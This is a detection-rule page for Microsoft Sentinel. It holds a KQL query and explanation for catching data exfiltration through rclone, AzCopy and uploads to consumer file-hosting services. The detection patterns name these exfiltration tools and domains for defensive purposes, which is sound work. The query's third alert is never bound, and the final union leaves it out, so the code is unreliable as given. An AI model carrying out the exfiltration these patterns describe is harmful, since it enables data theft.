THREAT-CloudStorage-DataExfil Microsoft Sentinel · KQL

Detect Data Exfiltration via Cloud Storage Services in Microsoft Sentinel

Exfiltration of corporate data to attacker-controlled cloud storage is a dominant technique in double-extortion ransomware campaigns and espionage operations. Adversaries use legitimate cloud storage services (Mega, Dropbox, OneDrive, Box, Google Drive, rclone, AzCopy, ShareFile) to blend exfiltration traffic with normal business activity, bypassing egress monitoring that blocks unknown C2 IPs. Scattered Spider used Mega for SMB data exfiltration before ransomware deployment in 2024-2025. Akira and Black Basta affiliates use rclone with SFTP/cloud backends. Lazarus Group favors Dropbox and Google Drive. Key indicators: rclone.exe or azcopy.exe execution with external cloud endpoints, large outbound data transfers to cloud storage IPs, WinSCP or FileZilla used for bulk data staging, and PowerShell Invoke-WebRequest with cloud storage URLs. Detection opportunity exists in the staging phase (file collection before transfer) and the transfer phase (network and process telemetry).

MITRE ATT&CK

Tactic
Exfiltration

KQL Detection Query

Microsoft Sentinel (KQL)
kusto 
// THREAT: Data Exfiltration via Cloud Storage
// Detects use of rclone, AzCopy, and cloud storage APIs for data exfiltration

// Alert 1: rclone execution (major exfiltration tool for ransomware groups)
let RcloneIndicators = DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName =~ "rclone.exe"
    or ProcessCommandLine has_any ("rclone", "rclone.exe")
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
    InitiatingProcessFileName, FolderPath
| extend ThreatType = "Exfil_Rclone"
| extend RiskScore = 85;
// Alert 2: AzCopy with external Azure storage accounts
let AzCopyExternal = DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName =~ "azcopy.exe" or FileName =~ "azcopy"
| where ProcessCommandLine has_any (
    "blob.core.windows.net", "file.core.windows.net",
    "queue.core.windows.net"
  )
// Exclude known corporate storage accounts
| where ProcessCommandLine !has "<YOUR_CORPORATE_STORAGE_ACCOUNT>"
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine
| extend ThreatType = "Exfil_AzCopy_External"
| extend RiskScore = 80;
// Alert 3: Large data upload to cloud storage (network telemetry)
DeviceNetworkEvents
| where Timestamp > ago(24h)
| where ActionType =~ "ConnectionSuccess"
| where RemoteUrl has_any (
    "mega.nz", "mega.io",
    "dropbox.com", "dropboxapi.com",
    "box.com", "box.net",
    "onedrive.live.com", "1drv.ms",
    "sharefile.com", "drive.google.com",
    "sendspace.com", "filebin.net",
    "transfer.sh", "gofile.io", "anonfiles.com"
  ) or RemoteUrl matches regex @"[a-z0-9]{5,}\.blob\.core\.windows\.net"
| summarize
    Connections=count(),
    BytesSent=sum(SentBytes),
    Domains=make_set(RemoteUrl)
  by DeviceName, AccountName, InitiatingProcessFileName, bin(Timestamp, 1h)
| where BytesSent > 100000000  // 100MB threshold
| extend ThreatType = "Exfil_LargeCloudUpload"
| extend RiskScore = 70;
union RcloneIndicators, AzCopyExternal
| sort by RiskScore desc, Timestamp desc
critical severity high confidence

Three-vector cloud exfiltration detection: (1) rclone.exe execution — the primary exfiltration tool documented in Akira, Black Basta, and Scattered Spider campaigns; (2) AzCopy with external Azure storage account URLs — attackers stage data in attacker-controlled Azure Blob storage; (3) large data uploads (>100MB/hour) to known file hosting and consumer cloud storage services. All three are SMB-relevant double-extortion indicators.

Data Sources

Microsoft Defender for Endpoint (DeviceProcessEvents, DeviceNetworkEvents)Sysmon Event ID 1, 3Proxy/web gateway logsNetwork flow data (NetFlow/IPFIX)

Required Tables

DeviceProcessEventsDeviceNetworkEvents

False Positives & Tuning

  • Legitimate rclone use by system administrators for cloud backup operations (should be documented and excluded by account name)
  • Corporate AzCopy scripts synchronising data with legitimate company Azure storage accounts
  • Users with business accounts for Dropbox or Box uploading work files (OneDrive and Box are commonly used for business)
  • Large legitimate data transfers to authorised cloud archival storage
Download portable Sigma rule (.yml)

Other platforms for THREAT-CloudStorage-DataExfil

Splunk (SPL) Elastic Security (Elastic) IBM QRadar (QRadar) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 1 adversary technique from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Simulate Cloud Exfiltration via rclone to Mega

    Expected signal: Sysmon Event ID 1: rclone.exe with copy command targeting mega remote. Sysmon Event ID 3: network connection to mega.co.nz or api.mega.co.nz.

Last updated: 2026-04-24 Research depth: deep
References (5)

Unlock Pro Content

Get the full detection package for THREAT-CloudStorage-DataExfil including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1567.002Exfiltration to Cloud Storage

Related Techniques

T1567.002Exfiltration to Cloud StorageT1048Exfiltration Over Alternative ProtocolT1005Data from Local SystemT1039Data from Network Shared DriveT1486Data Encrypted for Impact

Same Tactic: Exfiltration

Popular Detections